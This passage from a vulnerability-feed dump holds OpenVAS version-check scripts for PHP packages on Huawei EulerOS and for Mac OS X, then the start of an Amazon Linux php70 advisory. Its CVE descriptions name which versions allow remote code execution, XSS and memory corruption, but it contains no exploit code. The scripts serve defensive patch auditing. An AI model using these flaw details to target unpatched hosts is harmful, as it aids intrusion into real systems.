\"CVE-2015-8835\", \"CVE-2015-8867\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10397\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6293\", \"CVE-2016-6294\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7418\", \"CVE-2016-7480\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\", \"CVE-2017-7272\", \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\", \"CVE-2017-9229\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5712\", \"CVE-2019-11040\", \"CVE-2019-11041\", \"CVE-2019-11042\", \"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:56:51 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:56:51 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2438)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2438\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2438\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-2438 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\nThe finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data. Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\next/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.(CVE-2016-7124)\n\nThe match function in pcre_exec.c in PCRE before 8.37 mishandles the /(?:((abcd))<pipe>(((?:(?:(?:(?:abc<pipe>(?:abcdef))))b)abcdefghi)abc)<pipe>((*ACCEPT)))/ pattern and related patterns involving (*ACCEPT), which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (partially initialized memory and application crash) via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror, aka ZDI-CAN-2547.(CVE-2015-8382)\n\nAn issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\nexif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\nThe SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.(CVE-2016-7480)\n\next/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.(CVE-2016-7411)\n\nThe odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_ ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:52", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2649)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2014-9767", "CVE-2017-9224", "CVE-2016-7414", "CVE-2017-12933", "CVE-2014-9912", "CVE-2016-6288", "CVE-2011-4718", "CVE-2017-9228", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-3185", "CVE-2018-10545", "CVE-2017-11143", "CVE-2018-5712", "CVE-2017-9229", "CVE-2016-7125", "CVE-2016-4543", "CVE-2016-4542", "CVE-2017-9227", "CVE-2016-4541", "CVE-2017-11628", "CVE-2017-7272", "CVE-2016-2554", "CVE-2018-14851", "CVE-2015-8835", "CVE-2017-16642", "CVE-2015-6833", "CVE-2016-4070", "CVE-2015-8874", "CVE-2016-6292", "CVE-2016-9934", "CVE-2015-4116", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-10159", "CVE-2016-7411", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-7480", "CVE-2019-11043", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-8935", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-8866", "CVE-2016-10161", "CVE-2015-5589", "CVE-2016-3141", "CVE-2018-10547", "CVE-2016-6291", "CVE-2016-10158", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142", "CVE-2018-5711", "CVE-2015-7804", "CVE-2016-7412"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192649", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2649\");\n script_version(\"2020-01-23T13:11:07+0000\");\n script_cve_id(\"CVE-2011-4718\", \"CVE-2014-9767\", \"CVE-2014-9912\", \"CVE-2015-4116\", \"CVE-2015-5589\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8835\", \"CVE-2015-8866\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10161\", \"CVE-2016-10397\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7418\", \"CVE-2016-7480\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\", \"CVE-2017-7272\", \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\", \"CVE-2017-9229\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5711\", \"CVE-2018-5712\", \"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:11:07 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:11:07 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2649)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2649\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2649\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-2649 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\nAn issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it's used as an index, resulting in an out-of-bounds write memory corruption.(CVE-2017-9228)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg-dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.(CVE-2017-9229)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.(CVE-2017-9224)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:06", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-02-22T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 February-2017", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7628", "CVE-2016-8620", "CVE-2016-8623", "CVE-2016-5420", "CVE-2016-7714", "CVE-2016-7414", "CVE-2016-7647", "CVE-2016-4693", "CVE-2016-7594", "CVE-2016-8615", "CVE-2016-8616", "CVE-2016-7606", "CVE-2016-7667", "CVE-2016-8619", "CVE-2016-7620", "CVE-2016-7603", "CVE-2016-7655", "CVE-2016-7761", "CVE-2016-7637", "CVE-2016-7616", "CVE-2016-8625", "CVE-2016-8618", "CVE-2016-7622", "CVE-2016-4691", "CVE-2016-7636", "CVE-2016-7661", "CVE-2016-7141", "CVE-2016-7615", "CVE-2016-7629", "CVE-2016-7644", "CVE-2016-7643", "CVE-2016-8617", "CVE-2016-7624", "CVE-2016-1777", "CVE-2016-7413", "CVE-2016-7662", "CVE-2016-7617", "CVE-2016-7663", "CVE-2016-6304", "CVE-2016-7618", "CVE-2016-7619", "CVE-2016-7609", "CVE-2016-7627", "CVE-2016-8622", "CVE-2016-7416", "CVE-2016-7657", "CVE-2016-7602", "CVE-2016-7633", "CVE-2016-7625", "CVE-2016-7660", "CVE-2016-7411", "CVE-2016-8624", "CVE-2016-7417", "CVE-2016-7742", "CVE-2016-7621", "CVE-2016-6303", "CVE-2016-7600", "CVE-2016-7418", "CVE-2016-5421", "CVE-2016-7607", "CVE-2016-7605", "CVE-2016-7591", "CVE-2016-7595", "CVE-2016-7588", "CVE-2016-5419", "CVE-2016-7167", "CVE-2016-7612", "CVE-2016-8621", "CVE-2016-7608", "CVE-2016-7659", "CVE-2016-7412", "CVE-2016-7658"], "modified": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310810567", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 February-2017\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810567\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\",\n \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\", \"CVE-2016-7609\",\n \"CVE-2016-7628\", \"CVE-2016-7658\", \"CVE-2016-7659\", \"CVE-2016-7624\",\n \"CVE-2016-7605\", \"CVE-2016-7617\", \"CVE-2016-7647\", \"CVE-2016-7663\",\n \"CVE-2016-7627\", \"CVE-2016-7655\", \"CVE-2016-7588\", \"CVE-2016-7603\",\n \"CVE-2016-7595\", \"CVE-2016-7667\", \"CVE-2016-5419\", \"CVE-2016-5420\",\n \"CVE-2016-5421\", \"CVE-2016-7141\", \"CVE-2016-7167\", \"CVE-2016-8615\",\n \"CVE-2016-8616\", \"CVE-2016-8617\", \"CVE-2016-8618\", \"CVE-2016-8619\",\n \"CVE-2016-8620\", \"CVE-2016-8621\", \"CVE-2016-8622\", \"CVE-2016-8623\",\n \"CVE-2016-8624\", \"CVE-2016-8625\", \"CVE-2016-7633\", \"CVE-2016-7616\",\n \"CVE-2016-4691\", \"CVE-2016-7618\", \"CVE-2016-7622\", \"CVE-2016-7594\",\n \"CVE-2016-7643\", \"CVE-2016-7602\", \"CVE-2016-7608\", \"CVE-2016-7591\",\n \"CVE-2016-7657\", \"CVE-2016-7625\", \"CVE-2016-7714\", \"CVE-2016-7620\",\n \"CVE-2016-7606\", \"CVE-2016-7612\", \"CVE-2016-7607\", \"CVE-2016-7615\",\n \"CVE-2016-7621\", \"CVE-2016-7637\", \"CVE-2016-7644\", \"CVE-2016-7629\",\n \"CVE-2016-7619\", \"CVE-2016-1777\", \"CVE-2016-7600\", \"CVE-2016-7742\",\n \"CVE-2016-6303\", \"CVE-2016-6304\", \"CVE-2016-7661\", \"CVE-2016-4693\",\n \"CVE-2016-7636\", \"CVE-2016-7662\", \"CVE-2016-7660\", \"CVE-2016-7761\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-02-22 17:03:09 +0530 (Wed, 22 Feb 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 February-2017\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207423\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName)\n{\n if(osVer =~ \"^10\\.12\" && version_is_less(version:osVer, test_version:\"10.12.2\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.2\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2023-06-03T15:23:27", "description": "**Issue Overview:**\n\next/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata (CVE-2016-7412).\n\nUse-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call (CVE-2016-7413).\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c (CVE-2016-7414).\n\next/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument (CVE-2016-7416).\n\next/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data (CVE-2016-7417).\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call (CVE-2016-7418). \n\n\n \n**Affected Packages:** \n\n\nphp70\n\n \n**Issue Correction:** \nRun _yum update php70_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php70-enchant-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-bcmath-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-process-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-intl-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-gmp-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-soap-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-xml-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mbstring-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mcrypt-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-json-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-gd-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-recode-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-snmp-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-imap-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-ldap-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-tidy-7.0.11-1.16.amzn1.i686 \n 